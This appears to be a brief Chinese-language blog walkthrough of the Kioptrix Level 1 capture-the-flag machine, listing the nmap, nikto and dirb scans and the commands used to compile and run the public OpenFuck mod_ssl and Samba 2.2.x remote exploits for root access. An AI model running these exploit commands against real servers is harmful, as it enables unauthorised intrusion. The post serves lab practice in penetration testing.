2.3.19

Kioptrix: Level 1 #1 CTF

靶機的IP是192.168.1.103
先用NMAP掃服務  nmap -A 192.168.1.103
















發現 22 80 139 443的服務



22 port ssh 可用暴力破解
跳過,先找漏洞再說
掃web服務漏洞

nikto -h http://192.168.1.103
















發現CVE2002-0082
掃描網頁目錄
dirb http://192.168.1.103

















發現沒有用的目錄
但有發現網頁漏洞
在www.exploit-db.com找到Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow此漏洞
腳本程式碼太舊
又找到新版openfuck-2017以編譯好的
下載git clone https://github.com/gazcbm/openfuck-2017.git
提高權限 chmod 777 OpenFuck
執行./OpenFuck













網頁伺服器為apache1.3.20對應為0X6B

執行./OpenFuck 0x6b 192.168.1.103 443 -C 50成功 取得root權限










139port 也是一個不錯的點
smb服務
用msfconsole掃一下版本,看有沒有漏洞













剛好samba2.2.1a就有
也是到www.exploit-db.com找到Samba < 2.2.8 (Linux/BSD) - Remote Code Execution此漏洞
下載攻擊腳本,下載下來是10.C,C語言的版本要編譯
gcc -o poc 10.c
攻擊
./poc -b 0 192.168.1.103 取得root權限
















用msfconsole 最方便,有內建攻擊模組

沒有留言:

張貼留言